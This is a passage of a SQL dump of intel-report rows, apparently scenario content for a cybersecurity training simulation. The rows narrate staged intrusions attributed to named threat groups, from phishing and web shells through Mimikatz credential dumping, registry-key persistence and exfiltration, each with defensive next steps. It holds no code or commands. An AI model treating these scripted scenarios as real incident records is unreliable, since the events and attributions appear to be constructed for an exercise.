(34, 8, 321, 3, 'Persistence Mechanism Investigation', '### Overview\nThe detection of a **persistence mechanism** indicates that the attackers are attempting to maintain access to the compromised system.\n\n### Detailed Analysis\n- **Registry Changes:** The malware modified registry keys to ensure execution upon startup.\n- **Scheduled Tasks:** A new scheduled task was created to execute the malware at regular intervals.\n- **Service Installation:** A new service, disguised as a legitimate application, was installed to run the malware.\n\n### Next Steps\n- **Containment:** Disable the scheduled tasks and services related to the malware.\n- **Forensics:** Analyze registry changes to understand the full scope.\n- **Monitoring:** Prepare for potential lateral movement attempts, as attackers may try to extend control over the network.', '2026-01-02 20:23:41'),
(35, 8, 322, 4, 'Lateral Movement Analysis', '### Overview\nThe alert for **lateral movement** suggests that APT10 is attempting to expand its foothold within the network.\n\n### Detailed Analysis\n- **Tools Used:** The attackers utilized tools such as `PsExec` and `WMI` to move laterally.\n- **Compromised Accounts:** Credentials from privileged accounts were used, indicating possible credential dumping.\n- **Targets:** Lateral movement attempts were detected towards servers hosting critical data.\n\n### Next Steps\n- **Containment:** Reset passwords for compromised accounts and enhance MFA enforcement.\n- **Forensics:** Conduct a thorough audit of account activities and access logs.\n- **Monitoring:** Be vigilant for data exfiltration attempts, as the attackers might next attempt to extract sensitive information.', '2026-01-02 20:23:41'),
(36, 8, 323, 5, NULL, NULL, '2026-01-02 20:23:41'),
(37, 9, 324, 1, NULL, NULL, '2026-01-02 20:29:44'),
(38, 9, 325, 2, 'Analysis of Malicious Firmware Update', '### Executive Summary\nAfter detecting suspicious network traffic suggesting initial access, a detailed analysis of the firmware update process revealed an unauthorized update to the firewall\'s SPI flash memory.\n\n### Technical Details\n- **Firmware Image**: The firmware image checksum did not match the expected value, indicating tampering.\n- **Analysis Tools**: Utilized Binwalk and Firmware Mod Kit to dissect the firmware.\n- **Findings**: Embedded payload designed for remote command execution.\n\n### Next Steps\nInvestigate persistence mechanisms that may have been established through this malicious firmware.', '2026-01-02 20:29:44'),
(39, 9, 326, 3, 'Investigation of Persistence Mechanism', '### Executive Summary\nA persistence mechanism was detected, ensuring the malicious firmware\'s survival across reboots.\n\n### Technical Details\n- **Method**: The implant modified bootloader scripts to reload the malicious payload.\n- **Detection Tools**: Compared bootloader script with known good configurations.\n\n### Next Steps\nMonitoring for signs of lateral movement within the network.', '2026-01-02 20:29:44'),
(40, 9, 327, 4, 'Signs of Lateral Movement within Network', '### Executive Summary\nThe compromised firewall is being used as a pivot point for lateral movement within the network.\n\n### Technical Details\n- **Indicators of Compromise (IoCs)**: Multiple unusual authentication attempts logged.\n- **Network Zones Affected**: Activity detected in the DMZ and internal subnet.\n\n### Next Steps\nEstablish containment measures to prevent further spread and identify C2 communication channels.', '2026-01-02 20:29:44'),
(41, 9, 328, 5, 'Command and Control Channel Analysis', '### Executive Summary\nA command and control channel has been established, facilitating remote administration of the compromised system.\n\n### Technical Details\n- **C2 Protocol**: Detected use of DNS tunneling for stealthy communication.\n- **Frequency**: Regular beaconing every 5 minutes.\n\n### Next Steps\nImplement measures to block C2 communication and monitor for data exfiltration attempts.', '2026-01-02 20:29:44'),
(42, 9, 329, 6, 'Detection of Data Exfiltration Attempt', '### Executive Summary\nA data exfiltration attempt was intercepted, aimed at extracting sensitive information from the network.\n\n### Technical Details\n- **Method**: Data packaged in compressed archives, sent over HTTPS.\n- **Volume**: Approximately 500MB of data targeted.\n\n### Next Steps\nInvestigate for signs of privilege escalation that may have facilitated the exfiltration.', '2026-01-02 20:29:44'),
(43, 9, 330, 7, 'Privilege Escalation Analysis', '### Executive Summary\nPrivilege escalation attempts have been detected, likely to gain higher-level access for further exploitation.\n\n### Technical Details\n- **Vector**: Exploitation of known vulnerability in outdated software.\n- **Detection**: Log analysis showed unauthorized changes to system files and configurations.\n\n### Next Steps\nExamine logs and configurations for attempts to cover tracks and evade defenses.', '2026-01-02 20:29:44'),
(44, 9, 331, 8, 'Defense Evasion Tactics Observed', '### Executive Summary\nAttempts to cover tracks and evade defense mechanisms were observed following privilege escalation.\n\n### Technical Details\n- **Tactics**: Deletion of log files, disabling of security tools.\n- **Detection Tools**: Anomaly detection in SIEM highlighted these activities.\n\n### Next Steps\nConduct internal reconnaissance to determine the target assets and finalize response strategies.', '2026-01-02 20:29:44'),
(45, 9, 332, 9, 'Internal Reconnaissance Activities', '### Executive Summary\nInternal reconnaissance activities have been detected, indicating preparation for final data extraction.\n\n### Technical Details\n- **Techniques Used**: Network scanning and mapping of critical systems.\n- **Tools Detected**: Use of custom scripts mimicking legitimate admin tools.\n\n### Next Steps\nPrepare for potential final data extraction and reinforce monitoring on critical assets.', '2026-01-02 20:29:44'),
(46, 9, 333, 10, 'Final Data Extraction Attempt Analysis', '### Executive Summary\nA final data extraction attempt was detected, marking the culmination of the attack chain.\n\n### Technical Details\n- **Targeted Data**: High-value intellectual property and customer data.\n- **Method**: Attempted exfiltration via cloud-based storage services.\n\n### Conclusion\nThe attack cycle is complete. Immediate containment and remediation actions should be prioritized to prevent future breaches.', '2026-01-02 20:29:44'),
(47, 10, 334, 1, 'Analysis of Obfuscated JavaScript Payload', '### Overview\nFollowing the detection of the compromised website, analysts have identified a suspicious JavaScript payload designed to execute upon a user\'s visit. This script is heavily obfuscated, suggesting advanced techniques employed by APT32 to avoid detection.\n\n### Observations\n- **Obfuscation Techniques:** The script uses multiple layers of encoding and dynamic code generation.\n- **Execution Trigger:** The payload is triggered when specific conditions are met, such as user agent matching and referrer checks.\n\n### Recommendations\n- **Immediate Action:** Set up sandbox environments to safely deobfuscate and analyze the script.\n- **Further Investigation:** Monitor network traffic for any anomalous patterns indicative of further payload execution.', '2026-01-02 20:31:37'),
(48, 10, 335, 2, 'Custom Backdoor Analysis', '### Overview\nUpon successful execution of the obfuscated JavaScript, a custom backdoor is installed on macOS systems. This backdoor is unique to APT32 and provides persistent access to infected devices.\n\n### Key Features\n- **Persistence Mechanism:** The backdoor uses Launch Daemons for persistence, ensuring it runs at startup.\n- **Capabilities:** Allows remote access, file manipulation, and execution of arbitrary commands.\n\n### Recommendations\n- **Detection:** Implement host-based rules to detect known persistence techniques used by this backdoor.\n- **Mitigation:** Advise users to update macOS and employ endpoint protection solutions.', '2026-01-02 20:31:37'),
(49, 10, 336, 3, 'Command and Control Communication Analysis', '### Overview\nThe custom backdoor begins communicating with a Command and Control (C2) server once installed. This stage marks the lateral movement phase, where the attacker maintains control over the compromised devices.\n\n### Observations\n- **C2 Channels:** Utilizes HTTPS for encrypted communication, making detection challenging.\n- **Behavioral Patterns:** Regular check-ins with the server and potential data upload activity.\n\n### Recommendations\n- **Network Monitoring:** Deploy advanced monitoring to identify atypical HTTPS traffic patterns.\n- **Threat Intelligence:** Leverage threat intelligence feeds to flag known APT32 infrastructure.', '2026-01-02 20:31:37'),
(50, 10, 337, 4, 'Data Exfiltration Attempt Detected', '### Overview\nThe final stage of the attack involves attempts to exfiltrate sensitive data from the compromised organization. This represents a significant threat to the confidentiality of human rights advocacy efforts.\n\n### Observations\n- **Exfiltration Tactics:** Use of compressed archives sent over encrypted channels.\n- **Data Types Targeted:** Email communications, internal documents, and contact databases.\n\n### Recommendations\n- **Data Loss Prevention (DLP):** Implement DLP solutions to monitor and block unauthorized data transfers.\n- **Incident Response:** Engage incident response teams to contain and mitigate the impact of exfiltration attempts.', '2026-01-02 20:31:37'),
(51, 10, 338, 5, NULL, NULL, '2026-01-02 20:31:37'),
(52, 11, 339, 1, 'Web Shell Deployment Detected', '### Overview\nFollowing the initial access via ProxyLogon Zero-Day exploit, our systems have identified the deployment of a web shell, specifically **China Chopper**.\n\n### Details\n- **Web Shell Name**: China Chopper\n- **Behavior**: Provides attackers with remote access and control over the compromised server.\n- **Indicators of Compromise (IoCs)**: Presence of unusual web application files.\n\n### Next Steps\nFocus on identifying the source of the web shell and potential attackers. Prepare for potential credential theft attempts, which are commonly executed following web shell deployment.', '2026-01-03 00:04:00'),
(53, 11, 340, 2, 'Credential Harvesting Detected', '### Overview\nAfter the deployment of China Chopper, there are signs of credential harvesting using **Mimikatz**.\n\n### Details\n- **Tool Used**: Mimikatz\n- **Purpose**: Extracting user credentials from the compromised system.\n- **Indicators**: Unauthorized access attempts, suspicious processes running on the server.\n\n### Next Steps\nMonitor for lateral movement attempts within the network, as attackers may use harvested credentials to propagate.', '2026-01-03 00:04:00'),
(54, 11, 341, 3, 'Lateral Movement Activity Observed', '### Overview\nCredential harvesting has led to lateral movement through SMB protocol, indicating an attempt to propagate within the network.\n\n### Details\n- **Protocol Used**: SMB (Server Message Block)\n- **Objective**: Gain access to additional systems using harvested credentials.\n- **Indicators**: Unusual login attempts across network nodes.\n\n### Next Steps\nPrepare for potential reconnaissance activities by the attackers, as they seek to map the network and identify valuable data.', '2026-01-03 00:04:00'),
(55, 11, 342, 4, 'Reconnaissance Activity Detected', '### Overview\nFollowing lateral movement, attackers are executing reconnaissance commands to gather information about the network.\n\n### Details\n- **Commands Used**: Network mapping tools, system enumeration commands.\n- **Purpose**: Identify critical systems and data of interest.\n- **Indicators**: Unusual network scans and command executions.\n\n### Next Steps\nAnticipate data collection attempts for exfiltration. Implement monitoring to detect unusual data access patterns.', '2026-01-03 00:04:00'),
(56, 11, 343, 5, 'Data Collection Identified', '### Overview\nReconnaissance has led to data collection activities, likely preparing for exfiltration.\n\n### Details\n- **Activity**: Access and aggregation of sensitive data.\n- **Objective**: Prepare data for exfiltration.\n- **Indicators**: Large data access events, unusual file movements.\n\n### Next Steps\nExpect attempts to exfiltrate data via HTTP POST or other channels. Enhance monitoring on outbound traffic.', '2026-01-03 00:04:00'),
(57, 11, 344, 6, 'Data Exfiltration Attempt Detected', '### Overview\nData exfiltration is underway, with attackers using HTTP POST requests to transmit collected data.\n\n### Details\n- **Method**: HTTP POST\n- **Target**: External servers\n- **Indicators**: Unusual outbound traffic patterns, large amounts of data being sent out.\n\n### Next Steps\nPrepare for potential cleanup operations by attackers. Strengthen defenses to prevent further exfiltration and identify any remaining web shells or backdoors.', '2026-01-03 00:04:00'),
(58, 11, 345, 7, 'Defense Evasion Activity Noted', '### Overview\nAttackers are attempting to clean up and remove indicators of their presence to evade detection.\n\n### Details\n- **Activities**: Deleting logs, removing malware traces, altering system settings.\n- **Objective**: Obfuscate attack traces and maintain persistence.\n- **Indicators**: Missing logs, altered system configurations.\n\n### Next Steps\nConduct a thorough forensic analysis to recover deleted logs and identify any remaining indicators. Implement stronger endpoint monitoring to detect future attempts.', '2026-01-03 00:04:00'),
(59, 11, 346, 8, NULL, NULL, '2026-01-03 00:04:00'),
(60, 12, 347, 1, 'Analysis of Initial Access via Spear Phishing', '# Initial Access via Spear Phishing\n\n## Summary\nFollowing the detection of spear phishing attempts, analysis of intercepted emails reveals the use of legitimate-looking diplomatic communications as a lure. The phishing emails were tailored to the targeted individuals using publicly available information.\n\n## Details\n- **Sender**: The emails appear to originate from trusted diplomatic entities.\n- **Payload**: The emails contain malicious attachments that exploit vulnerabilities in document readers.\n- **Target**: Individuals within diplomatic networks.\n\n## Next Steps\nThe successful spear phishing attack sets the stage for the execution of a Remote Access Tool (RAT), which is likely the next step in the adversary\'s playbook.\n\n## Recommendations\n- Increase awareness and training for diplomatic personnel regarding spear phishing tactics.\n- Implement email filtering and sandboxing solutions to detect and block malicious attachments.', '2026-01-03 00:37:55'),
(61, 12, 348, 2, 'Execution of Remote Access Tool (RAT) Analysis', '# Execution of Remote Access Tool\n\n## Summary\nAfter gaining initial access, the adversaries executed a Remote Access Tool (RAT) on compromised systems. This RAT allows them to remotely control the infected machines and facilitates further exploitation.\n\n## Details\n- **RAT Capabilities**: File transfer, command execution, and keylogging.\n- **Persistence**: The RAT is configured to start at system boot, ensuring continuous access.\n- **Communication**: The tool communicates with command and control (C2) servers using encrypted channels to evade detection.\n\n## Next Steps\nDeployment of a rootkit is anticipated to establish deeper persistence and stealth, likely the next phase in the attack.\n\n## Recommendations\n- Monitor network traffic for anomalous connections to known or suspected C2 domains.\n- Conduct thorough endpoint scans to identify and neutralize the RAT.', '2026-01-03 00:37:55'),
(62, 12, 349, 3, 'Rootkit Deployment and Persistence Mechanism', '# Rootkit Deployment for Persistence\n\n## Summary\nThe adversaries have deployed a sophisticated rootkit to ensure persistent access to compromised systems. This rootkit is designed to operate silently and evade detection by traditional security tools.\n\n## Details\n- **Rootkit Features**: Kernel-level access, anti-debugging techniques, and hidden file storage.\n- **Impact**: The rootkit grants long-term control over the system and masks malicious activities.\n- **Detection**: Difficult to detect without specialized tools due to its deep integration.\n\n## Next Steps\nWith rootkit persistence established, the attackers are likely to move laterally within the network, exploiting hijacked credentials to expand their reach.\n\n## Recommendations\n- Deploy advanced endpoint detection and response (EDR) solutions to identify unusual behavior.\n- Perform regular integrity checks of system files and settings.', '2026-01-03 00:37:55'),
(63, 12, 350, 4, 'Lateral Movement and Credential Access', '# Lateral Movement via Hijacked Credentials\n\n## Summary\nUtilizing hijacked credentials, the adversaries are expanding their presence across the network. This lateral movement allows them to access additional systems and data.\n\n## Details\n- **Credential Theft**: Credentials were harvested using keyloggers and memory scraping techniques.\n- **Access Points**: Compromised accounts are used to access shared drives, email servers, and other critical systems.\n- **Objective**: Broader network infiltration to locate valuable intelligence.\n\n## Next Steps\nThe adversaries will likely use hijacked satellite links to exfiltrate sensitive data, masking their C2 locations and avoiding detection.\n\n## Recommendations\n- Implement multi-factor authentication (MFA) to reduce the risk of credential misuse.\n- Monitor for unusual login patterns and access attempts to critical systems.', '2026-01-03 00:37:55'),
(64, 12, 351, 5, NULL, NULL, '2026-01-03 00:37:55'),
(65, 13, 352, 1, 'Analysis of Initial Network Breach', '### Summary\nFollowing the alert on suspicious access to the university network, further investigation has revealed that APT40 utilized spear-phishing emails to target university staff, leading to credential theft. These credentials were then used to access the university\'s internal network.\n\n### Detailed Findings\n- **Phishing Campaign**: APT40 crafted emails with attachments masquerading as legitimate maritime research documents, luring victims into opening them.\n- **Credential Harvesting**: Upon opening, malicious scripts captured login credentials, which were then used in lateral movement attempts.\n\n### Next Steps\nMonitor for signs of malware execution, as this is the typical progression post-initial access in APT40 operations.', '2026-01-03 00:42:39'),
(66, 13, 353, 2, 'Detection of Custom Malware Execution', '### Summary\nSubsequent to the initial breach, custom malware was detected executing within the compromised network. This malware is designed to blend with legitimate maritime research applications, making detection challenging.\n\n### Malware Profile\n- **Custom Build**: The malware shows characteristics unique to APT40, including obfuscated code and modular functionality.\n- **Capabilities**: It can execute commands, capture keystrokes, and exfiltrate data.\n\n### Recommendations\n- **Increased Monitoring**: Implement advanced monitoring for web shell installations as APT40 typically progresses to establishing persistence following malware execution.', '2026-01-03 00:42:39'),
(67, 13, 354, 3, 'Establishing Persistence via Web Shell', '### Summary\nAPT40 has been observed deploying web shells to maintain persistence within the compromised university network. These web shells provide ongoing access even if the initial breach is discovered and remediated.\n\n### Web Shell Indicators\n- **File Names and Locations**: Web shells are hidden within legitimate directories under misleading names.\n- **Command and Control**: Use of HTTP/S protocols to communicate with external servers.\n\n### Countermeasures\n- **File Integrity Monitoring**: Deploy monitoring solutions to detect unauthorized file changes or additions.\n- **Network Traffic Analysis**: Watch for anomalous outbound traffic indicative of data staging or exfiltration.', '2026-01-03 00:42:39'),
(68, 13, 355, 4, 'Lateral Movement to Secure Data Sources', '### Summary\nAPT40 has successfully moved laterally within the network, gaining access to secure data sources including databases containing sensitive maritime research.\n\n### Lateral Movement Tactics\n- **Credential Stuffing**: Utilization of harvested credentials to access different network segments.\n- **Remote Desktop Protocol (RDP)**: Exploiting RDP to move between systems and access secured data.\n\n### Next Steps\nPrepare for potential data exfiltration activities by analyzing network logs for large outbound data transfers, especially focusing on sonar technology schematics.', '2026-01-03 00:42:39'),
(69, 13, 356, 5, NULL, NULL, '2026-01-03 00:42:39'),
(70, 14, 357, 1, 'Analysis of Initial Compromise Vector', '### Overview\nFollowing the detection of suspicious web traffic attributed to a drive-by download, further analysis reveals the presence of a malicious downloader script embedded within a compromised website. This script is responsible for initiating the subsequent malicious activities.\n\n### Technical Details\n- **Infection Vector**: Compromised website hosting a malicious JavaScript file.\n- **Observed Behavior**: The script attempts to download and execute a secondary payload, likely a PowerShell script.\n\n### Next Steps\nMonitor for execution of PowerShell scripts, which may indicate the deployment of additional malware components or the initiation of further malicious actions.', '2026-01-03 00:50:36'),
(71, 14, 358, 2, 'PowerShell Script Analysis', '### Overview\nAfter the execution of a malicious PowerShell script, an in-depth investigation reveals its purpose in establishing persistence and facilitating further attacks.\n\n### Technical Details\n- **Script Functionality**: The script modifies registry keys to ensure the persistence of malware across system reboots.\n- **Indicators of Compromise**: Registry modifications detected in `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`.\n\n### Next Steps\nMonitor registry activity for additional modifications and prepare for potential credential theft attempts.', '2026-01-03 00:50:36'),
(72, 14, 359, 3, 'Persistence Mechanism and Impact', '### Overview\nThe persistence mechanism has been successfully established via registry modifications, allowing the malicious payload to survive system restarts.\n\n### Technical Details\n- **Impact**: Ensures the continued operation of malicious processes.\n- **Associated Risks**: Increased likelihood of credential dumping tools being deployed to harvest sensitive information.\n\n### Next Steps\nInitiate enhanced monitoring for credential theft activities, such as the use of Mimikatz or similar tools.', '2026-01-03 00:50:36'),
(73, 14, 360, 4, 'Credential Dumping Detection and Mitigation', '### Overview\nThe detection of credential dumping attempts using Mimikatz indicates an escalation in the attack, with the adversary aiming to harvest user credentials.\n\n### Technical Details\n- **Detected Activity**: Execution of Mimikatz binary or similar tools.\n- **Potential Exposure**: Compromise of user and administrative credentials.\n\n### Mitigation Steps\nImmediately rotate all credentials identified as potentially compromised and enforce multi-factor authentication (MFA) across the network.', '2026-01-03 00:50:36'),
(74, 14, 361, 5, 'Suspicious File Transfer Analysis', '### Overview\nSuspicious file transfers over SMB traffic have been detected, potentially indicating lateral movement or exfiltration activities.\n\n### Technical Details\n- **Observed Traffic**: Unusual SMB connections and file transfer patterns.\n- **Potential Objectives**: Data staging for exfiltration or deployment of ransomware payloads.\n\n### Next Steps\nIsolate affected systems and review transferred files for signs of ransomware payloads or sensitive data.', '2026-01-03 00:50:36'),
(75, 14, 362, 6, 'Data Encryption Activity and Ransom Note', '### Overview\nActive ransomware encryption processes have been detected, indicating the adversary\'s final objective to encrypt and hold data for ransom.\n\n### Technical Details\n- **Encryption Process**: Rapid file encryption observed across multiple directories.\n- **Ransom Note**: A note demanding payment in cryptocurrency for decryption keys has been identified.\n\n### Response Actions\nInitiate incident response protocols to contain the spread of encryption, engage in negotiation simulations, and explore decryption options without payment.', '2026-01-03 00:50:36'),
(76, 14, 363, 7, NULL, NULL, '2026-01-03 00:50:36'),
(77, 15, 364, 1, 'Analysis of Anomalous PowerShell Activity', '### Overview\nFollowing the detection of a suspicious web shell on the IIS server, further investigation has revealed anomalous PowerShell activities. These activities indicate that the attacker may be attempting to execute scripts remotely to escalate their privileges or install additional payloads.\n\n### Key Indicators\n- **PowerShell Execution Logs**: Multiple instances of PowerShell command execution were logged, originating from the compromised server.\n- **Obfuscation Techniques**: The commands were heavily obfuscated, a common technique used to evade detection.\n\n### Recommendations\n- **Immediate Review**: Conduct a thorough review of PowerShell logs across all servers.\n- **Restrict PowerShell Usage**: Implement restrictive policies to limit PowerShell script execution to trusted users only.', '2026-01-03 00:54:31'),
(78, 15, 365, 2, 'Discovery of Hidden Scheduled Task', '### Overview\nAfter observing anomalous PowerShell activity, a hidden scheduled task was discovered on the compromised server. This task is likely set up to ensure the attacker maintains persistence within the network.\n\n### Details\n- **Task Name**: The task was found under a misleading name resembling a legitimate system update.\n- **Execution Timing**: Scheduled to execute during off-peak hours to avoid detection.\n\n### Recommendations\n- **Task Audit**: Conduct a comprehensive audit of scheduled tasks on all critical systems.\n- **Security Policies**: Strengthen policies to alert on the creation of new scheduled tasks without proper authorization.', '2026-01-03 00:54:31');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(79, 15, 366, 3, 'Unauthorized Network Map Access Detected', '### Overview\nThe creation of a hidden scheduled task led to an incident where unauthorized access to the telecom network map was detected. This access suggests the attacker is preparing for lateral movement within the network.\n\n### Indicators\n- **Access Logs**: The logs show access by an unauthorized user account, possibly compromised through credential theft.\n- **Network Map Utility**: The access was directed at a utility used specifically by network engineers.\n\n### Recommendations\n- **Account Review**: Immediately review access permissions and enforce multi-factor authentication for all sensitive accounts.\n- **Monitor Tools**: Increase monitoring on network management tools to detect unusual access patterns.', '2026-01-03 00:54:31'),
(80, 15, 367, 4, 'Exfiltration of Call Detail Records', '### Overview\nThe final stage of the intrusion was marked by the exfiltration of call detail records (CDRs), confirming the adversary\'s objective.\n\n### Exfiltration Details\n- **Data Transfer**: Significant outbound data transfers were recorded, consistent with the volume of CDRs.\n- **Destination IP**: Transfers were directed towards an external server that has been linked to previous Gallium APT activities.\n\n### Recommendations\n- **Data Loss Prevention**: Implement DLP solutions to monitor and block unauthorized data transfers.\n- **Incident Response**: Initiate a full incident response procedure to assess the extent of the breach and remediate affected systems.', '2026-01-03 00:54:31'),
(81, 15, 368, 5, NULL, NULL, '2026-01-03 00:54:31'),
(82, 16, 369, 1, NULL, NULL, '2026-01-03 23:52:02'),
(83, 16, 370, 2, 'Macro Execution Insight', '### Context:\nUpon the detection of a suspicious macro-enabled document, further investigation revealed that the document contained obfuscated macro code designed to execute a malicious script. This script initiates the download of additional payloads, leading to the execution phase.\n\n### Next Steps:\nMonitor for unusual script executions and network traffic indicative of further payload downloads.', '2026-01-03 23:52:02'),
(84, 16, 371, 3, 'POWERSTATS Backdoor Analysis', '### Context:\nThe malicious script executed by the macro has installed the POWERSTATS backdoor, which is known for persistence mechanisms that allow attackers to maintain access to the system. This backdoor is commonly used by MuddyWater for further command execution and data exfiltration.\n\n### Next Steps:\nEnsure endpoint detection systems are updated to identify and block POWERSTATS activity.', '2026-01-03 23:52:02'),
(85, 16, 372, 4, 'C2 Communication Detected', '### Context:\nEncrypted communications have been detected with a known MuddyWater command and control (C2) server. This indicates active C2 communication, allowing for remote control and data exfiltration.\n\n### Next Steps:\nIsolate the infected systems to prevent further C2 interactions and gather network traffic logs for analysis.', '2026-01-03 23:52:02'),
(86, 16, 373, 5, 'Lateral Movement Patterns', '### Context:\nThere has been an attempt to move laterally across the network, likely using compromised credentials and exploiting network shares. This movement aims to expand the attack footprint within the agency\'s infrastructure.\n\n### Next Steps:\nConduct a thorough investigation of access logs and isolate affected network segments to prevent further lateral movement.', '2026-01-03 23:52:02'),
(87, 16, 374, 6, 'Credential Dumping Tactics', '### Context:\nCredential dumping activities have been identified, suggesting the use of tools like Mimikatz. This is a precursor for lateral movement and privilege escalation within the network.\n\n### Next Steps:\nInitiate a password reset for potentially compromised accounts and enhance monitoring for atypical login attempts.', '2026-01-03 23:52:02'),
(88, 16, 375, 7, 'Exfiltration Activity Alert', '### Context:\nFile transfer activities to an external server have been detected, indicating potential data exfiltration efforts by the attackers. This is a critical phase of the attack lifecycle.\n\n### Next Steps:\nBlock outbound connections to the identified external IPs and assess the types of data potentially exfiltrated.', '2026-01-03 23:52:02'),
(89, 16, 376, 8, 'Wiper Logic Activation', '### Context:\nThe execution of wiper logic has been detected, signaling the attacker\'s intent to destroy data and disrupt operations under the guise of ransomware.\n\n### Next Steps:\nInitiate backup restoration procedures and ensure data integrity checks are performed to verify the completeness of recovered data.', '2026-01-03 23:52:02'),
(90, 16, 377, 9, 'Forensic Artifact Analysis', '### Context:\nForensic artifact recovery has begun to understand the attack vector and methods used by MuddyWater. This is crucial for identifying weaknesses and preventing future attacks.\n\n### Next Steps:\nCollaborate with forensic experts to analyze recovered artifacts and compile an incident report for strategic improvements.', '2026-01-03 23:52:02'),
(91, 16, 378, 10, 'Mitigation and Remediation Summary', '### Context:\nComprehensive mitigation and remediation measures have been implemented, focusing on patching vulnerabilities, enhancing monitoring, and reinforcing security protocols.\n\n### Next Steps:\nConduct a post-incident review to evaluate the effectiveness of response actions and update security policies accordingly.', '2026-01-03 23:52:02'),
(92, 17, 379, 1, 'Analysis of Malicious Payload Execution', '# Analysis of Malicious Payload Execution\n\nFollowing the detection of a phishing email, a detailed investigation has identified the execution of a malicious payload on the target system. This payload, typically a Remote Access Trojan (RAT), allows the attacker to gain control over the infected system.\n\n## Key Findings:\n- **Payload Type:** The executed payload is consistent with APT1\'s known use of RATs to establish remote access.\n- **Execution Method:** The payload was executed via a script embedded in a seemingly benign document delivered through the phishing email.\n- **Next Steps:** Close monitoring is required to detect any persistence mechanisms that may be established by the attacker to maintain access.', '2026-01-04 00:59:40'),
(93, 17, 380, 2, 'Insight into Persistence Mechanisms', '# Insight into Persistence Mechanisms\n\nAfter executing the malicious payload, the attacker has likely installed a persistence mechanism to ensure continued access to the compromised system.\n\n## Key Techniques:\n- **Registry Modifications:** Changes to the system registry to enable the payload to execute upon system startup.\n- **Scheduled Tasks:** Creation of scheduled tasks that regularly trigger the payload.\n- **Service Creation:** Establishment of new services that run the malicious code in the background.\n\n## Implications:\nThe presence of these mechanisms suggests a strategic attempt to maintain long-term access. Monitoring for credential dumping is advised as the next phase in the attack lifecycle.', '2026-01-04 00:59:40'),
(94, 17, 381, 3, 'Credential Dumping Activity Overview', '# Credential Dumping Activity Overview\n\nThe persistence mechanisms have paved the way for the attacker to perform credential dumping, a technique used to extract user credentials from the compromised system.\n\n## Techniques Observed:\n- **LSASS Memory Dumping:** Access to Local Security Authority Subsystem Service (LSASS) memory to extract credentials.\n- **SAM Database Extraction:** Copying the Security Account Manager (SAM) database for offline analysis.\n- **Tools Used:** Use of known tools like Mimikatz to facilitate credential dumping.\n\n## Recommendations:\nImmediate action is required to prevent lateral movement within the network. Look out for data exfiltration attempts as potential next steps.', '2026-01-04 00:59:40'),
(95, 17, 382, 4, 'Data Exfiltration Attempt Analysis', '# Data Exfiltration Attempt Analysis\n\nFollowing credential dumping, the attacker has attempted to exfiltrate data from the target network.\n\n## Exfiltration Methods:\n- **Encrypted Channels:** Use of encrypted channels (e.g., HTTPS, VPN) to hide data transfer.\n- **Cloud Services:** Leveraging cloud storage services to exfiltrate data without arousing suspicion.\n- **FTP/SFTP:** Use of file transfer protocols to move data out of the network.\n\n## Detected Indicators:\n- Sudden spikes in outbound traffic.\n- Unusual access to cloud storage services.\n\n## Conclusion:\nThe detected data exfiltration attempt underscores the need for enhanced monitoring and response protocols to mitigate data loss and further unauthorized access.', '2026-01-04 00:59:40'),
(96, 17, 383, 5, NULL, NULL, '2026-01-04 00:59:40'),
(97, 18, 384, 1, 'Investigation of Spear Phishing Email', '### Overview\nThe initial access vector was identified as a spear phishing email targeting key personnel within the organization. The email contained a seemingly legitimate attachment that, once opened, executed a hidden script.\n\n### Analysis\n- **Sender:** The email originated from a spoofed address resembling a trusted partner.\n- **Content:** The attachment was a weaponized document with macros that, when enabled, triggered the download of a malicious payload.\n\n### Next Steps\n- **Immediate Action:** Advise recipients of similar emails to report and delete them without opening.\n- **Preparation for Next Alert:** Monitor systems for signs of script execution and unusual network activity.', '2026-01-04 02:06:57'),
(98, 18, 385, 2, 'Detection of Malicious PowerShell Activity', '### Overview\nFollowing the execution of the spear phishing attack, a malicious PowerShell script was detected. This script is designed to further compromise the network.\n\n### Analysis\n- **Script Functionality:** The script attempts to download additional payloads and establish a connection back to the attacker\'s command and control server.\n- **Indicators of Compromise (IoCs):** Unusual PowerShell commands observed, including obfuscated and encoded scripts.\n\n### Next Steps\n- **Mitigation:** Disable PowerShell scripting for non-administrative users and review execution logs.\n- **Preparation for Next Alert:** Monitor registry changes as the attacker may attempt to establish persistence.', '2026-01-04 02:06:57'),
(99, 18, 386, 3, 'Detection of Registry Modifications', '### Overview\nThe attacker has modified the registry to maintain persistence on targeted systems. This tactic ensures the malicious presence is sustained even after a reboot.\n\n### Analysis\n- **Registry Changes:** Specific keys related to startup and session management have been altered, pointing to unauthorized scripts.\n- **Persistence Mechanism:** Use of Run and RunOnce registry keys to ensure the script executes at startup.\n\n### Next Steps\n- **Immediate Action:** Restore original registry settings and remove unauthorized entries.\n- **Preparation for Next Alert:** Monitor for credential access attempts, which may indicate lateral movement.', '2026-01-04 02:06:57'),
(100, 18, 387, 4, 'Credential Dumping Activity Detected', '### Overview\nThe attacker is attempting lateral movement through credential dumping techniques. This is a critical phase where compromised credentials could lead to further infiltration.\n\n### Analysis\n- **Techniques Used:** Tools like Mimikatz have been detected, indicating attempts to extract credentials from memory.\n- **Targets:** Domain controllers and high-value systems are primary targets for credential harvesting.\n\n### Next Steps\n- **Mitigation:** Isolate affected systems and change all credentials for compromised accounts.\n- **Preparation for Next Alert:** Monitor network for encrypted traffic patterns indicating data exfiltration.', '2026-01-04 02:06:57'),
(101, 18, 388, 5, NULL, NULL, '2026-01-04 02:06:57'),
(102, 19, 389, 1, 'Analysis of APT10\'s Initial Access Techniques', '### Overview\nFollowing the alert of initial access through compromised MSP credentials, further analysis reveals that APT10 leveraged a combination of social engineering and spear-phishing attacks to acquire the necessary credentials. \n\n### Detailed Findings\n- **Phishing Campaign**: Targeted emails were sent to MSP employees, masquerading as official communications.\n- **Credential Harvesting**: APT10 used fake login portals to capture login details.\n\n### Next Steps\nFocus shifts to potential execution methods, with particular attention to DLL side-loading techniques known to be favored by APT10.', '2026-01-04 02:14:19'),
(103, 19, 390, 2, 'APT10\'s Use of DLL Side-Loading for Execution', '### Overview\nPost-execution analysis indicates that APT10 utilized DLL side-loading to run malicious code within trusted applications, bypassing security protocols.\n\n### Detailed Findings\n- **Target Application**: A legitimate aerospace CAD application was identified as the host for the side-loaded DLL.\n- **Malware Characteristics**: The malicious DLL was designed to trigger upon application start-up, ensuring seamless execution.\n\n### Next Steps\nInvestigations will now focus on how persistence is established post-execution, particularly through backdoor implants.', '2026-01-04 02:14:19'),
